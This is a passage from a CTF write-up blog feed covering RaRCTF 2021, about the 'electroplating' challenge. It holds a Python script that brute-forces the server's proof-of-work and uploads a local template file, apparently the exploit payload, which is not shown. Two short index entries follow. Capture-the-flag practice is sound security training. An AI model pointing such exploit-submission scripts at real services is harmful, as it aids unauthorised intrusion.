<span class="nb">hash</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">sha256</span><span class="p">(</span><span class="n">prefix</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> <span class="o">+</span> <span class="n">answer</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> <span class="o">+</span> <span class="n">suffix</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span>
<span class="k">return</span> <span class="nb">hash</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s2">"0"</span><span class="o">*</span><span class="n">difficulty</span><span class="p">)</span>
<span class="k">def</span><span class="w"> </span><span class="nf">solve</span><span class="p">(</span><span class="n">prefix</span><span class="p">,</span> <span class="n">suffix</span><span class="p">,</span> <span class="n">difficulty</span><span class="p">):</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="n">test</span> <span class="o">=</span> <span class="n">binascii</span><span class="o">.</span><span class="n">hexlify</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">urandom</span><span class="p">(</span><span class="mi">4</span><span class="p">))</span><span class="o">.</span><span class="n">decode</span><span class="p">()</span>
<span class="k">if</span> <span class="n">verify</span><span class="p">(</span><span class="n">prefix</span><span class="p">,</span> <span class="n">suffix</span><span class="p">,</span> <span class="n">test</span><span class="p">,</span> <span class="n">difficulty</span><span class="p">):</span>
<span class="k">return</span> <span class="n">test</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">Session</span><span class="p">()</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Hint: usage [url] [difficulty]"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Example: "</span> <span class="o">+</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="s2">" [url] [difficulty]"</span><span class="p">)</span>
<span class="n">host</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">difficulty</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">></span> <span class="mi">1</span> <span class="ow">and</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span>
<span class="n">host</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">></span> <span class="mi">2</span> <span class="ow">and</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span>
<span class="n">difficulty</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
<span class="k">if</span> <span class="n">host</span> <span class="ow">is</span> <span class="kc">None</span> <span class="ow">or</span> <span class="n">host</span> <span class="o">==</span> <span class="s2">""</span><span class="p">:</span>
<span class="n">host</span> <span class="o">=</span> <span class="s2">"https://electroplating.rars.win"</span>
<span class="k">if</span> <span class="n">difficulty</span> <span class="ow">is</span> <span class="kc">None</span><span class="p">:</span>
<span class="n">difficulty</span> <span class="o">=</span> <span class="mi">6</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">host</span> <span class="o">+</span> <span class="s2">"/pow"</span><span class="p">)</span><span class="o">.</span><span class="n">json</span><span class="p">()</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Solving POW"</span><span class="p">)</span>
<span class="n">solution</span> <span class="o">=</span> <span class="n">solve</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="s1">'pref'</span><span class="p">],</span> <span class="n">data</span><span class="p">[</span><span class="s1">'suff'</span><span class="p">],</span> <span class="n">difficulty</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Solved: </span><span class="si">{</span><span class="n">solution</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="n">s</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">host</span> <span class="o">+</span> <span class="s2">"/pow"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span><span class="s2">"answer"</span><span class="p">:</span> <span class="n">solution</span><span class="p">})</span>
<span class="n">files</span> <span class="o">=</span> <span class="p">{</span> <span class="s1">'file'</span><span class="p">:</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'template.htmlrs'</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="p">}</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">host</span> <span class="o">+</span> <span class="s2">"/"</span><span class="p">,</span> <span class="n">files</span><span class="o">=</span><span class="n">files</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">)</span>
</code></pre></div>RaRCTF 2021 Capture The Flag2021-08-06T19:00:00+02:002021-08-06T19:00:00+02:00moormastertag:moormaster.codeberg.page,2021-08-06:/CtfWriteups/rarctf-2021-capture-the-flag.html<p>URL: <a href="https://ctf.rars.win/">RaRCTF 2021 Capture The Flag</a></p>
<p>Github: <a href="https://github.com/TheWinRaRs/RaRCTF2021-Challenges-Public">RarCTF2021-Challenges-Public</a></p>
<p>Writeups can be found in category <a href="https://moormaster.codeberg.page/CtfWriteups/category/rarctf-2021-capture-the-flag.html">RaRCTF 2021 Capture The Flag</a></p>README2021-08-01T00:00:00+02:002021-08-01T00:00:00+02:00moormastertag:moormaster.codeberg.page,2021-08-01:/CtfWriteups/readme.html<p>In this category info about CTFs are listed. The writeups for each CTF can be found in the category for the CTF.</p>